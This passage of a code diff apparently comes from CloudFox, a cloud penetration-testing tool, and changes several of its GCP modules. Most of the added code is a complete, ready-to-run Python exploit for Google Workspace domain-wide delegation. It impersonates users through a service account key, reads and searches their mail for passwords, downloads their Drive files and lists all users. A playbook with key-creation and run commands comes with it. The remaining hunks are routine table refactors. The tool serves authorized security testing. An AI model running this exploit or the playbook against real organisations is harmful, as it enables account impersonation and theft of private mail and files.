zone.Name, zone.DNSName, + m.GetProjectName(zone.ProjectID), zone.Name, zone.DNSName, zone.Visibility, dnssec, security, networkInfo, forwarding, "-", "-", }) } diff --git a/gcp/commands/domainwidedelegation.go b/gcp/commands/domainwidedelegation.go index f98ebab4..dd360708 100644 --- a/gcp/commands/domainwidedelegation.go +++ b/gcp/commands/domainwidedelegation.go @@ -138,10 +138,6 @@ func (m *DomainWideDelegationModule) processProject(ctx context.Context, project // Initialize loot for this project if m.LootMap[projectID] == nil { m.LootMap[projectID] = make(map[string]*internal.LootFile) - m.LootMap[projectID]["dwd-commands"] = &internal.LootFile{ - Name: "dwd-commands", - Contents: "# Domain-Wide Delegation Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", - } } m.mu.Unlock() @@ -156,10 +152,6 @@ func (m *DomainWideDelegationModule) processProject(ctx context.Context, project m.mu.Lock() m.ProjectDWDAccounts[projectID] = accounts - - for _, account := range accounts { - m.addAccountToLoot(projectID, account) - } m.mu.Unlock() if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS && len(accounts) > 0 { @@ -170,36 +162,459 @@ func (m *DomainWideDelegationModule) processProject(ctx context.Context, project // ------------------------------ // Loot File Management // ------------------------------ -func (m *DomainWideDelegationModule) addAccountToLoot(projectID string, account domainwidedelegationservice.DWDServiceAccount) { - lootFile := m.LootMap[projectID]["dwd-commands"] - if lootFile == nil { - return + +// generateDWDPythonScript returns the Python exploit script (generated once globally) +func (m *DomainWideDelegationModule) generateDWDPythonScript() internal.LootFile { + pythonScript := `#!/usr/bin/env python3 +""" +Domain-Wide Delegation (DWD) Exploitation Script +Generated by CloudFox + +Usage: + # Interactive mode (authenticate once, run multiple actions): + python dwd_exploit.py --key-file KEY.json --subject user@domain.com + + # Single command mode: + python dwd_exploit.py --key-file KEY.json --subject user@domain.com --action read-emails + python dwd_exploit.py --key-file KEY.json --subject user@domain.com --all-scopes +""" + +import argparse +import base64 +import io +import sys +from google.oauth2 import service_account +from googleapiclient.discovery import build +from googleapiclient.http import MediaIoBaseDownload + +SCOPES = { + 'gmail_readonly': 'https://www.googleapis.com/auth/gmail.readonly', + 'gmail_send': 'https://www.googleapis.com/auth/gmail.send', + 'gmail_full': 'https://mail.google.com/', + 'drive_readonly': 'https://www.googleapis.com/auth/drive.readonly', + 'drive_full': 'https://www.googleapis.com/auth/drive', + 'calendar_readonly': 'https://www.googleapis.com/auth/calendar.readonly', + 'calendar_full': 'https://www.googleapis.com/auth/calendar', + 'admin_directory_users': 'https://www.googleapis.com/auth/admin.directory.user.readonly', + 'admin_directory_groups': 'https://www.googleapis.com/auth/admin.directory.group.readonly', + 'contacts': 'https://www.googleapis.com/auth/contacts.readonly', + 'sheets': 'https://www.googleapis.com/auth/spreadsheets', +} + +class DWDExploit: + def __init__(self, key_file, subject): + self.key_file = key_file + self.subject = subject + self.services = {} + self.working_scopes = set() + print(f"\n[*] Initialized DWD exploit") + print(f" Key file: {key_file}") + print(f" Subject: {subject}") + + def get_credentials(self, scopes): + if isinstance(scopes, str): + scopes = [scopes] + return service_account.Credentials.from_service_account_file( + self.key_file, scopes=scopes, subject=self.subject + ) + + def get_service(self, service_name, version, scope): + """Get or create a cached service.""" + key = f"{service_name}_{version}_{scope}" + if key not in self.services: + creds = self.get_credentials(SCOPES[scope]) + self.services[key] = build(service_name, version, credentials=creds) + return self.services[key] + + def test_all_scopes(self): + """Test which scopes are authorized.""" + print(f"\n[*] Testing all scopes for {self.subject}...") + for scope_name, scope_url in SCOPES.items(): + print(f"\n[*] Testing: {scope_name}") + try: + creds = self.get_credentials(scope_url) + if 'gmail' in scope_name: + service = build('gmail', 'v1', credentials=creds) + results = service.users().messages().list(userId='me', maxResults=5).execute() + count = len(results.get('messages', [])) + print(f" [+] SUCCESS - Found {count} messages") + self.working_scopes.add(scope_name) + elif 'drive' in scope_name: + service = build('drive', 'v3', credentials=creds) + results = service.files().list(pageSize=5).execute() + count = len(results.get('files', [])) + print(f" [+] SUCCESS - Found {count} files") + self.working_scopes.add(scope_name) + elif 'calendar' in scope_name: + service = build('calendar', 'v3', credentials=creds) + results = service.calendarList().list().execute() + count = len(results.get('items', [])) + print(f" [+] SUCCESS - Found {count} calendars") + self.working_scopes.add(scope_name) + elif 'admin_directory' in scope_name: + service = build('admin', 'directory_v1', credentials=creds) + results = service.users().list(customer='my_customer', maxResults=5).execute() + count = len(results.get('users', [])) + print(f" [+] SUCCESS - Found {count} users") + self.working_scopes.add(scope_name) + else: + print(f" [+] SUCCESS - Credentials created") + self.working_scopes.add(scope_name) + except Exception as e: + print(f" [-] FAILED: {str(e)[:80]}") + + print(f"\n[+] Working scopes: {', '.join(self.working_scopes) if self.working_scopes else 'None'}") + + def read_emails(self, max_results=20): + """Read emails from user's inbox.""" + service = self.get_service('gmail', 'v1', 'gmail_readonly') + results = service.users().messages().list(userId='me', maxResults=max_results).execute() + messages = results.get('messages', []) + + print(f"\n[+] Reading {len(messages)} emails for {self.subject}:\n") + for msg in messages: + msg_data = service.users().messages().get(userId='me', id=msg['id'], format='full').execute() + headers = {h['name']: h['value'] for h in msg_data['payload']['headers']} + + print(f"{'='*60}") + print(f"From: {headers.get('From', 'N/A')}") + print(f"To: {headers.get('To', 'N/A')}") + print(f"Subject: {headers.get('Subject', 'N/A')}") + print(f"Date: {headers.get('Date', 'N/A')}") + + body = "" + if 'parts' in msg_data['payload']: + for part in msg_data['payload']['parts']: + if part['mimeType'] == 'text/plain' and 'data' in part.get('body', {}): + body = base64.urlsafe_b64decode(part['body']['data']).decode('utf-8', errors='ignore') + break + elif 'body' in msg_data['payload'] and 'data' in msg_data['payload']['body']: + body = base64.urlsafe_b64decode(msg_data['payload']['body']['data']).decode('utf-8', errors='ignore') + + if body: + print(f"\nBody:\n{body[:500]}{'...' if len(body) > 500 else ''}") + print() + + def search_emails(self, query): + """Search emails with a query.""" + service = self.get_service('gmail', 'v1', 'gmail_readonly') + results = service.users().messages().list(userId='me', q=query, maxResults=20).execute() + messages = results.get('messages', []) + + print(f"\n[+] Found {len(messages)} emails matching '{query}':\n") + for msg in messages: + msg_data = service.users().messages().get(userId='me', id=msg['id'], format='metadata').execute() + headers = {h['name']: h['value'] for h in msg_data['payload']['headers']} + print(f" - {headers.get('Subject', 'N/A')[:60]} | From: {headers.get('From', 'N/A')[:30]}") + + def list_drive(self, max_results=50): + """List files in user's Drive.""" + service = self.get_service('drive', 'v3', 'drive_readonly') + results = service.files().list( + pageSize=max_results, + fields="files(id, name, mimeType, size, modifiedTime)" + ).execute() + files = results.get('files', []) + + print(f"\n[+] Found {len(files)} files in Drive:\n") + for f in files: + size = f.get('size', 'N/A') + if size != 'N/A': + size = f"{int(size)/1024:.1f}KB" + print(f" [{f['id'][:12]}] {f['name'][:45]} ({f['mimeType'].split('.')[-1]}) {size}") + + def download_file(self, file_id, output_path=None): + """Download a file from Drive.""" + service = self.get_service('drive', 'v3', 'drive_readonly') + file_meta = service.files().get(fileId=file_id, fields='name,mimeType').execute() + filename = output_path or file_meta['name'] + + request = service.files().get_media(fileId=file_id) + fh = io.BytesIO() + downloader = MediaIoBaseDownload(fh, request) + + done = False + while not done: + status, done = downloader.next_chunk() + print(f"\r[*] Download: {int(status.progress() * 100)}%", end='') + + with open(filename, 'wb') as f: + f.write(fh.getvalue()) + print(f"\n[+] Downloaded: {filename}") + + def list_users(self): + """List all Workspace users.""" + service = self.get_service('admin', 'directory_v1', 'admin_directory_users') + results = service.users().list(customer='my_customer', maxResults=200).execute() + users = results.get('users', []) + + print(f"\n[+] Found {len(users)} Workspace users:\n") + for user in users: + name = user.get('name', {}).get('fullName', 'N/A') + admin = "ADMIN" if user.get('isAdmin') else "" + print(f" - {user.get('primaryEmail'):<40} {name:<25} {admin}") + + def list_calendars(self): + """List user's calendars.""" + service = self.get_service('calendar', 'v3', 'calendar_readonly') + results = service.calendarList().list().execute() + calendars = results.get('items', []) + + print(f"\n[+] Found {len(calendars)} calendars:\n") + for cal in calendars: + print(f" - {cal.get('summary', 'N/A')} ({cal.get('id', 'N/A')[:40]})") + + def list_events(self, max_results=20): + """List upcoming calendar events.""" + from datetime import datetime + service = self.get_service('calendar', 'v3', 'calendar_readonly') + now = datetime.utcnow().isoformat() + 'Z' + results = service.events().list( + calendarId='primary', timeMin=now, maxResults=max_results, singleEvents=True, orderBy='startTime' + ).execute() + events = results.get('items', []) + + print(f"\n[+] Found {len(events)} upcoming events:\n") + for event in events: + start = event['start'].get('dateTime', event['start'].get('date')) + print(f" - {start[:16]} | {event.get('summary', 'No title')}") + + def change_subject(self, new_subject): + """Change the impersonated user.""" + self.subject = new_subject + self.services = {} # Clear cached services + print(f"\n[+] Now impersonating: {new_subject}") + + def interactive(self): + """Interactive mode - run multiple actions without re-authenticating.""" + print("\n" + "="*60) + print(" DWD Interactive Mode") + print(" Type 'help' for commands, 'quit' to exit") + print("="*60) + + while True: + try: + cmd = input(f"\n[{self.subject}]> ").strip().lower() + except (EOFError, KeyboardInterrupt): + print("\n[*] Exiting...") + break + + if not cmd: + continue + + parts = cmd.split(maxsplit=1) + action = parts[0] + args = parts[1] if len(parts) > 1 else "" + + try: + if action in ('quit', 'exit', 'q'): + print("[*] Exiting...") + break + elif action == 'help': + self.print_help() + elif action == 'test' or action == 'scopes': + self.test_all_scopes() + elif action == 'emails' or action == 'inbox': + self.read_emails() + elif action == 'search': + if not args: + args = input(" Search query: ").strip() + self.search_emails(args) + elif action == 'drive' or action == 'files': + self.list_drive() + elif action == 'download': + if not args: + args = input(" File ID: ").strip() + self.download_file(args) + elif action == 'users': + self.list_users() + elif action == 'calendars': + self.list_calendars() + elif action == 'events': + self.list_events() + elif action == 'subject' or action == 'impersonate': + if not args: + args = input(" New subject email: ").strip() + self.change_subject(args) + elif action == 'whoami': + print(f"\n Key file: {self.key_file}") + print(f" Subject: {self.subject}") + print(f" Working scopes: {', '.join(self.working_scopes) if self.working_scopes else 'Not tested yet'}") + else: + print(f" Unknown command: {action}. Type 'help' for commands.") + except Exception as e: + print(f" [!] Error: {e}") + + def print_help(self): + print(""" + Commands: + test / scopes - Test which scopes are authorized + emails / inbox - Read inbox emails + search - Search emails (e.g., search password) + drive / files - List Google Drive files + download - Download a Drive file + users - List all Workspace users (requires admin) + calendars - List calendars + events - List upcoming calendar events + subject - Switch to impersonate a different user + whoami - Show current configuration + help - Show this help + quit / exit / q - Exit interactive mode + """) + + +def main(): + parser = argparse.ArgumentParser(description='DWD Exploitation Script') + parser.add_argument('--key-file', required=True, help='Service account key JSON file') + parser.add_argument('--subject', required=True, help='Email of user to impersonate') + parser.add_argument('--all-scopes', action='store_true', help='Test all scopes and exit') + parser.add_argument('--action', choices=[ + 'read-emails', 'search-emails', 'list-drive', 'download-file', + 'list-users', 'list-calendars', 'list-events' + ], help='Single action to perform (non-interactive)') + parser.add_argument('--query', help='Search query for search-emails') + parser.add_argument('--file-id', help='File ID for download-file') + parser.add_argument('--output', help='Output path for download-file') + args = parser.parse_args() + + exploit = DWDExploit(args.key_file, args.subject) + + # Single action modes + if args.all_scopes: + exploit.test_all_scopes() + elif args.action == 'read-emails': + exploit.read_emails() + elif args.action == 'search-emails': + if not args.query: + parser.error('--query is required for search-emails') + exploit.search_emails(args.query) + elif args.action == 'list-drive': + exploit.list_drive() + elif args.action == 'download-file': + if not args.file_id: + parser.error('--file-id is required for download-file') + exploit.download_file(args.file_id, args.output) + elif args.action == 'list-users': + exploit.list_users() + elif args.action == 'list-calendars': + exploit.list_calendars() + elif args.action == 'list-events': + exploit.list_events() + else: + # No action specified - enter interactive mode + exploit.interactive() + +if __name__ == '__main__': + main() +` + + return internal.LootFile{ + Name: "dwd_exploit.py", + Contents: pythonScript, } +} - // Add exploit commands for each account - if len(account.ExploitCommands) > 0 { - lootFile.Contents += fmt.Sprintf( - "## Service Account: %s (Project: %s)\n"+ - "# DWD Enabled: %v\n"+ - "# OAuth2 Client ID: %s\n"+ - "# Keys: %d user-managed key(s)\n", - account.Email, account.ProjectID, - account.DWDEnabled, - account.OAuth2ClientID, - len(account.Keys), - ) - // List key details - for _, key := range account.Keys { - lootFile.Contents += fmt.Sprintf( - "# - Key ID: %s (Created: %s, Expires: %s, Algorithm: %s)\n", - key.KeyID, key.CreatedAt, key.ExpiresAt, key.KeyAlgorithm, - ) +// generateDWDCommands generates the commands file for a specific project's accounts +func (m *DomainWideDelegationModule) generateDWDCommands(accounts []domainwidedelegationservice.DWDServiceAccount) internal.LootFile { + var commands strings.Builder + commands.WriteString(`# Domain-Wide Delegation (DWD) Exploitation Commands +# Generated by CloudFox +# WARNING: Only use with proper authorization + +# ============================================================================= +# DISCOVERED DWD SERVICE ACCOUNTS +# ============================================================================= +`) + + for _, account := range accounts { + dwdStatus := "No" + if account.DWDEnabled { + dwdStatus = "Yes" } - lootFile.Contents += "\n" - for _, cmd := range account.ExploitCommands { - lootFile.Contents += cmd + "\n" + commands.WriteString(fmt.Sprintf("\n# %s\n", account.Email)) + commands.WriteString(fmt.Sprintf("# DWD Enabled: %s | Keys: %d\n", dwdStatus, len(account.Keys))) + if account.OAuth2ClientID != "" { + commands.WriteString(fmt.Sprintf("# OAuth2 Client ID: %s\n", account.OAuth2ClientID)) } - lootFile.Contents += "\n" + for _, key := range account.Keys { + commands.WriteString(fmt.Sprintf("# Key: %s\n", key.KeyID)) + } + } + + commands.WriteString(` +# ============================================================================= +# STEP 1: INSTALL DEPENDENCIES +# ============================================================================= +pip install google-auth google-auth-oauthlib google-api-python-client + +# ============================================================================= +# STEP 2: CREATE A SERVICE ACCOUNT KEY (if needed) +# ============================================================================= +# Replace with the service account email from above + +gcloud iam service-accounts keys create sa-key.json \ + --iam-account= + +# ============================================================================= +# STEP 3: RUN THE EXPLOIT SCRIPT (INTERACTIVE MODE) +# ============================================================================= +# Replace: +# sa-key.json - Path to the service account key file +# admin@domain.com - Email of Workspace user to impersonate + +# Start interactive mode (recommended - authenticate once, run many commands): +python dwd_exploit.py --key-file sa-key.json --subject admin@domain.com + +# Interactive commands: +# test - Test which scopes are authorized +# emails - Read inbox emails +# search - Search emails (e.g., search password reset) +# drive - List Google Drive files +# download - Download a Drive file +# users - List all Workspace users +# calendars - List calendars +# events - List upcoming calendar events +# subject - Switch to impersonate a different user +# whoami - Show current config +# quit - Exit + +# ============================================================================= +# STEP 3 (ALT): SINGLE COMMAND MODE +# ============================================================================= +# If you prefer single commands instead of interactive mode: + +# Test all scopes: +python dwd_exploit.py --key-file sa-key.json --subject admin@domain.com --all-scopes + +# Read emails: +python dwd_exploit.py --key-file sa-key.json --subject admin@domain.com --action read-emails + +# Search emails: +python dwd_exploit.py --key-file sa-key.json --subject admin@domain.com --action search-emails --query "password" + +# List Drive files: +python dwd_exploit.py --key-file sa-key.json --subject admin@domain.com --action list-drive + +# Download a file: +python dwd_exploit.py --key-file sa-key.json --subject admin@domain.com --action download-file --file-id FILE_ID + +# List Workspace users: +python dwd_exploit.py --key-file sa-key.json --subject admin@domain.com --action list-users + +# ============================================================================= +# NOTES +# ============================================================================= +# - Scopes must be pre-authorized in Google Admin Console: +# Admin Console > Security > API Controls > Domain-wide Delegation +# - The service account's OAuth2 Client ID must be listed there +# - Not all scopes may be authorized - run 'test' to check +# - admin_directory scopes require impersonating a Workspace admin user +# - In interactive mode, use 'subject' command to switch users without restarting +`) + + return internal.LootFile{ + Name: "dwd-playbook", + Contents: commands.String(), } } @@ -216,8 +631,7 @@ func (m *DomainWideDelegationModule) writeOutput(ctx context.Context, logger int func (m *DomainWideDelegationModule) getHeader() []string { return []string{ - "Project ID", - "Project Name", + "Project", "Email", "DWD Enabled", "OAuth2 Client ID", @@ -245,7 +659,6 @@ func (m *DomainWideDelegationModule) accountsToTableBody(accounts []domainwidede // One row per key for _, key := range account.Keys { body = append(body, []string{ - account.ProjectID, m.GetProjectName(account.ProjectID), account.Email, dwdStatus, @@ -259,7 +672,6 @@ func (m *DomainWideDelegationModule) accountsToTableBody(accounts []domainwidede } else { // Account with no keys - still show it body = append(body, []string{ - account.ProjectID, m.GetProjectName(account.ProjectID), account.Email, dwdStatus, @@ -294,16 +706,18 @@ func (m *DomainWideDelegationModule) writeHierarchicalOutput(ctx context.Context ProjectLevelData: make(map[string]internal.CloudfoxOutput), } - for projectID := range m.ProjectDWDAccounts { + // Generate Python script once (same for all projects) + pythonScript := m.generateDWDPythonScript() + + for projectID, accounts := range m.ProjectDWDAccounts { tableFiles := m.buildTablesForProject(projectID) var lootFiles []internal.LootFile - if projectLoot, ok := m.LootMap[projectID]; ok { - for _, loot := range projectLoot { - if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { - lootFiles = append(lootFiles, *loot) - } - } + if len(accounts) > 0 { + // Add Python script to each project + lootFiles = append(lootFiles, pythonScript) + // Add project-specific commands + lootFiles = append(lootFiles, m.generateDWDCommands(accounts)) } outputData.ProjectLevelData[projectID] = DomainWideDelegationOutput{Table: tableFiles, Loot: lootFiles} @@ -331,12 +745,9 @@ func (m *DomainWideDelegationModule) writeFlatOutput(ctx context.Context, logger } var lootFiles []internal.LootFile - for _, projectLoot := range m.LootMap { - for _, loot := range projectLoot { - if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { - lootFiles = append(lootFiles, *loot) - } - } + if len(allAccounts) > 0 { + lootFiles = append(lootFiles, m.generateDWDPythonScript()) + lootFiles = append(lootFiles, m.generateDWDCommands(allAccounts)) } output := DomainWideDelegationOutput{ diff --git a/gcp/commands/endpoints.go b/gcp/commands/endpoints.go index 2dc42af3..d838965d 100644 --- a/gcp/commands/endpoints.go +++ b/gcp/commands/endpoints.go @@ -1292,8 +1292,7 @@ func (m *EndpointsModule) writeOutput(ctx context.Context, logger internal.Logge func (m *EndpointsModule) getHeader() []string { return []string{ - "Project ID", - "Project Name", + "Project", "Name", "Type", "Exposure", @@ -1348,7 +1347,6 @@ func (m *EndpointsModule) endpointsToTableBody(endpoints []Endpoint) [][]string } body = append(body, []string{ - ep.ProjectID, m.GetProjectName(ep.ProjectID), ep.Name, ep.Type, diff --git a/gcp/commands/firewall.go b/gcp/commands/firewall.go index 39030f52..67163bbe 100644 --- a/gcp/commands/firewall.go +++ b/gcp/commands/firewall.go @@ -310,21 +310,21 @@ func (m *FirewallModule) writeOutput(ctx context.Context, logger internal.Logger // Table headers func (m *FirewallModule) getRulesHeader() []string { return []string{ - "Project Name", "Project ID", "Rule Name", "Network", "Direction", + "Project", "Rule Name", "Network", "Direction", "Priority", "Source Ranges", "Allowed", "Targets", "Disabled", "Logging", } } func (m *FirewallModule) getNetworksHeader() []string { return []string{ - "Project Name", "Project ID", "Network Name", "Routing Mode", + "Project", "Network Name", "Routing Mode", "Subnets", "Peerings", "Auto Subnets", } } func (m *FirewallModule) getSubnetsHeader() []string { return []string{ - "Project Name", "Project ID", "Network", "Subnet Name", + "Project", "Network", "Subnet Name", "Region", "CIDR Range", "Private Google Access", } } @@ -354,7 +354,6 @@ func (m *FirewallModule) rulesToTableBody(rules []NetworkService.FirewallRuleInf body = append(body, []string{ m.GetProjectName(rule.ProjectID), - rule.ProjectID, rule.Name, rule.Network, rule.Direction, @@ -386,7 +385,6 @@ func (m *FirewallModule) networksToTableBody(networks []NetworkService.VPCInfo) body = append(body, []string{ m.GetProjectName(network.ProjectID), - network.ProjectID, network.Name, network.RoutingMode, fmt.Sprintf("%d", subnetCount), @@ -403,7 +401,6 @@ func (m *FirewallModule) subnetsToTableBody(subnets []NetworkService.SubnetInfo) for _, subnet := range subnets { body = append(body, []string{ m.GetProjectName(subnet.ProjectID), - subnet.ProjectID, subnet.Network, subnet.Name, subnet.Region, diff --git a/gcp/commands/functions.go b/gcp/commands/functions.go index 6923f29a..385a104f 100644 --- a/gcp/commands/functions.go +++ b/gcp/commands/functions.go @@ -36,14 +36,19 @@ Security Columns: - Secrets: Count of secret environment variables and volumes Resource IAM Columns: -- Resource Role: The IAM role granted ON this function (e.g., roles/cloudfunctions.invoker) -- Resource Principal: The principal (user/SA/group) who has that role on this function +- IAM Binding Role: The IAM role granted ON this function (e.g., roles/cloudfunctions.invoker) +- IAM Binding Principal: The principal (user/SA/group) who has that role on this function Attack Surface: - Public HTTP functions may be directly exploitable - Functions with default service account may have excessive permissions - Functions with VPC connectors can access internal resources -- Event triggers reveal integration points (Pub/Sub, Storage, etc.)`, +- Event triggers reveal integration points (Pub/Sub, Storage, etc.) + +TIP: To see service account attack paths (privesc, exfil, lateral movement), +use the global --attack-paths flag: + + cloudfox gcp functions -p PROJECT_ID --attack-paths`, Run: runGCPFunctionsCommand, } @@ -96,6 +101,16 @@ func (m *FunctionsModule) Execute(ctx context.Context, logger internal.Logger) { // Get attack path cache from context (populated by all-checks or attack path analysis) m.AttackPathCache = gcpinternal.GetAttackPathCacheFromContext(ctx) + // If no context cache, try loading from disk cache + if m.AttackPathCache == nil || !m.AttackPathCache.IsPopulated() { + diskCache, metadata, err := gcpinternal.LoadAttackPathCacheFromFile(m.OutputDirectory, m.Account) + if err == nil && diskCache != nil && diskCache.IsPopulated() { + logger.InfoM(fmt.Sprintf("Using attack path cache from disk (created: %s)", + metadata.CreatedAt.Format("2006-01-02 15:04:05")), globals.GCP_FUNCTIONS_MODULE_NAME) + m.AttackPathCache = diskCache + } + } + m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_FUNCTIONS_MODULE_NAME, m.processProject) // Get all functions for stats @@ -297,8 +312,6 @@ func (m *FunctionsModule) writeOutput(ctx context.Context, logger internal.Logge // writeHierarchicalOutput writes output to per-project directories func (m *FunctionsModule) writeHierarchicalOutput(ctx context.Context, logger internal.Logger) { - header := m.getTableHeader() - // Build hierarchical output data outputData := internal.HierarchicalOutputData{ OrgLevelData: make(map[string]internal.CloudfoxOutput), @@ -307,12 +320,7 @@ func (m *FunctionsModule) writeHierarchicalOutput(ctx context.Context, logger in // Build project-level outputs for projectID, functions := range m.ProjectFunctions { - body := m.functionsToTableBody(functions) - tables := []internal.TableFile{{ - Name: globals.GCP_FUNCTIONS_MODULE_NAME, - Header: header, - Body: body, - }} + tables := m.buildTablesForProject(projectID, functions) // Collect loot for this project var lootFiles []internal.LootFile @@ -347,9 +355,8 @@ func (m *FunctionsModule) writeHierarchicalOutput(ctx context.Context, logger in // writeFlatOutput writes all output to a single directory (legacy mode) func (m *FunctionsModule) writeFlatOutput(ctx context.Context, logger internal.Logger) { - header := m.getTableHeader() allFunctions := m.getAllFunctions() - body := m.functionsToTableBody(allFunctions) + tables := m.buildTablesForProject("", allFunctions) // Collect all loot files var lootFiles []internal.LootFile @@ -361,17 +368,8 @@ func (m *FunctionsModule) writeFlatOutput(ctx context.Context, logger internal.L } } - tableFiles := []internal.TableFile{} - if len(body) > 0 { - tableFiles = append(tableFiles, internal.TableFile{ - Name: globals.GCP_FUNCTIONS_MODULE_NAME, - Header: header, - Body: body, - }) - } - output := FunctionsOutput{ - Table: tableFiles, + Table: tables, Loot: lootFiles, } @@ -405,11 +403,105 @@ func isEmptyLootFile(contents string) bool { strings.HasSuffix(contents, "# Secrets used by functions (names only)\n\n") } +// buildTablesForProject builds all tables for a given project's functions +func (m *FunctionsModule) buildTablesForProject(projectID string, functions []FunctionsService.FunctionInfo) []internal.TableFile { + tableFiles := []internal.TableFile{} + + // Main functions table + body := m.functionsToTableBody(functions) + if len(body) > 0 { + tableFiles = append(tableFiles, internal.TableFile{ + Name: globals.GCP_FUNCTIONS_MODULE_NAME, + Header: m.getTableHeader(), + Body: body, + }) + } + + // Secrets table (env vars and secret refs - matching Cloud Run format) + secretsHeader := []string{ + "Project", "Name", "Region", "Env Var", "Value/Type", "Source", "Sensitive", + } + + var secretsBody [][]string + for _, fn := range functions { + // Add environment variables from EnvVars (has actual values) + for _, env := range fn.EnvVars { + sensitive := isFunctionSensitiveEnvVar(env.Name) + if env.Source == "direct" { + secretsBody = append(secretsBody, []string{ + m.GetProjectName(fn.ProjectID), + fn.Name, + fn.Region, + env.Name, + env.Value, + "EnvVar", + sensitive, + }) + } else { + // Secret Manager reference + secretsBody = append(secretsBody, []string{ + m.GetProjectName(fn.ProjectID), + fn.Name, + fn.Region, + env.Name, + fmt.Sprintf("%s:%s", env.SecretName, env.SecretVersion), + "SecretManager", + "Yes", + }) + } + } + + // Add secret volumes + for _, volName := range fn.SecretVolumeNames { + secretsBody = append(secretsBody, []string{ + m.GetProjectName(fn.ProjectID), + fn.Name, + fn.Region, + volName + " (volume)", + volName, + "SecretManager", + "Yes", + }) + } + } + + if len(secretsBody) > 0 { + tableFiles = append(tableFiles, internal.TableFile{ + Name: globals.GCP_FUNCTIONS_MODULE_NAME + "-secrets", + Header: secretsHeader, + Body: secretsBody, + }) + } + + return tableFiles +} + +// isFunctionSensitiveEnvVar checks if an environment variable name indicates sensitive data +func isFunctionSensitiveEnvVar(envName string) string { + envNameUpper := strings.ToUpper(envName) + sensitivePatterns := []string{ + "PASSWORD", "PASSWD", "SECRET", "API_KEY", "APIKEY", "API-KEY", + "TOKEN", "ACCESS_TOKEN", "AUTH_TOKEN", "BEARER", "CREDENTIAL", + "PRIVATE_KEY", "PRIVATEKEY", "CONNECTION_STRING", "CONN_STR", + "DATABASE_URL", "DB_PASSWORD", "DB_PASS", "MYSQL_PASSWORD", + "POSTGRES_PASSWORD", "REDIS_PASSWORD", "MONGODB_URI", + "AWS_ACCESS_KEY", "AWS_SECRET", "AZURE_KEY", "GCP_KEY", + "ENCRYPTION_KEY", "SIGNING_KEY", "JWT_SECRET", "SESSION_SECRET", + "OAUTH", "CLIENT_SECRET", + } + for _, pattern := range sensitivePatterns { + if strings.Contains(envNameUpper, pattern) { + return "Yes" + } + } + return "No" +} + // getTableHeader returns the functions table header func (m *FunctionsModule) getTableHeader() []string { return []string{ - "Project Name", - "Project ID", + "Project", + "Type", "Name", "Region", "State", @@ -419,11 +511,11 @@ func (m *FunctionsModule) getTableHeader() []string { "Ingress", "Public", "Service Account", - "Attack Paths", - "VPC Connector", - "Secrets", - "Resource Role", - "Resource Principal", + "SA Attack Paths", + "Default SA", + "VPC Access", + "IAM Binding Role", + "IAM Binding Principal", } } @@ -434,36 +526,39 @@ func (m *FunctionsModule) functionsToTableBody(functions []FunctionsService.Func // Format trigger info triggerInfo := fn.TriggerType if fn.TriggerEventType != "" { - triggerInfo = fn.TriggerType + triggerInfo = fmt.Sprintf("%s (%s)", fn.TriggerType, extractFunctionName(fn.TriggerEventType)) } - // Format URL - no truncation + // Format URL url := "-" if fn.TriggerURL != "" { url = fn.TriggerURL } - // Format VPC connector - vpcConnector := "-" + // Format VPC access (renamed from VPC Connector for consistency with Cloud Run) + vpcAccess := "-" if fn.VPCConnector != "" { - vpcConnector = fn.VPCConnector - } - - // Format secrets count - secretsInfo := "-" - totalSecrets := fn.SecretEnvVarCount + fn.SecretVolumeCount - if totalSecrets > 0 { - secretsInfo = fmt.Sprintf("%d", totalSecrets) + vpcAccess = extractFunctionName(fn.VPCConnector) + if fn.VPCEgressSettings != "" { + vpcAccess += fmt.Sprintf(" (%s)", strings.TrimPrefix(fn.VPCEgressSettings, "VPC_EGRESS_")) + } } - // Format service account - no truncation + // Format service account serviceAccount := fn.ServiceAccount if serviceAccount == "" { serviceAccount = "-" } + // Check if using default service account + defaultSA := "No" + if strings.Contains(serviceAccount, "@appspot.gserviceaccount.com") || + strings.Contains(serviceAccount, "-compute@developer.gserviceaccount.com") { + defaultSA = "Yes" + } + // Check attack paths (privesc/exfil/lateral) for the service account - attackPaths := "-" + attackPaths := "run --attack-paths" if m.AttackPathCache != nil && m.AttackPathCache.IsPopulated() { if serviceAccount != "-" { attackPaths = m.AttackPathCache.GetAttackSummary(serviceAccount) @@ -472,24 +567,27 @@ func (m *FunctionsModule) functionsToTableBody(functions []FunctionsService.Func } } - // If function has IAM bindings, create one row per binding + // Format ingress for display (consistent with Cloud Run) + ingress := formatFunctionIngress(fn.IngressSettings) + + // If function has IAM bindings, create one row per binding (shows IAM Binding Role/Principal) if len(fn.IAMBindings) > 0 { for _, binding := range fn.IAMBindings { body = append(body, []string{ m.GetProjectName(fn.ProjectID), - fn.ProjectID, + "Function", fn.Name, fn.Region, fn.State, fn.Runtime, triggerInfo, url, - fn.IngressSettings, + ingress, shared.BoolToYesNo(fn.IsPublic), serviceAccount, attackPaths, - vpcConnector, - secretsInfo, + defaultSA, + vpcAccess, binding.Role, binding.Member, }) @@ -498,19 +596,19 @@ func (m *FunctionsModule) functionsToTableBody(functions []FunctionsService.Func // Function has no IAM bindings - single row body = append(body, []string{ m.GetProjectName(fn.ProjectID), - fn.ProjectID, + "Function", fn.Name, fn.Region, fn.State, fn.Runtime, triggerInfo, url, - fn.IngressSettings, + ingress, shared.BoolToYesNo(fn.IsPublic), serviceAccount, attackPaths, - vpcConnector, - secretsInfo, + defaultSA, + vpcAccess, "-", "-", }) @@ -518,3 +616,26 @@ func (m *FunctionsModule) functionsToTableBody(functions []FunctionsService.Func } return body } + +// formatFunctionIngress formats ingress settings for display (consistent with Cloud Run) +func formatFunctionIngress(ingress string) string { + switch ingress { + case "ALLOW_ALL": + return "ALL (Public)" + case "ALLOW_INTERNAL_ONLY": + return "INTERNAL" + case "ALLOW_INTERNAL_AND_GCLB": + return "INT+LB" + default: + return ingress + } +} + +// extractFunctionName extracts just the name from a resource path +func extractFunctionName(fullName string) string { + parts := strings.Split(fullName, "/") + if len(parts) > 0 { + return parts[len(parts)-1] + } + return fullName +} diff --git a/gcp/commands/gke.go b/gcp/commands/gke.go index 7dc8a908..c18d7d35 100644 --- a/gcp/commands/gke.go +++ b/gcp/commands/gke.go @@ -104,6 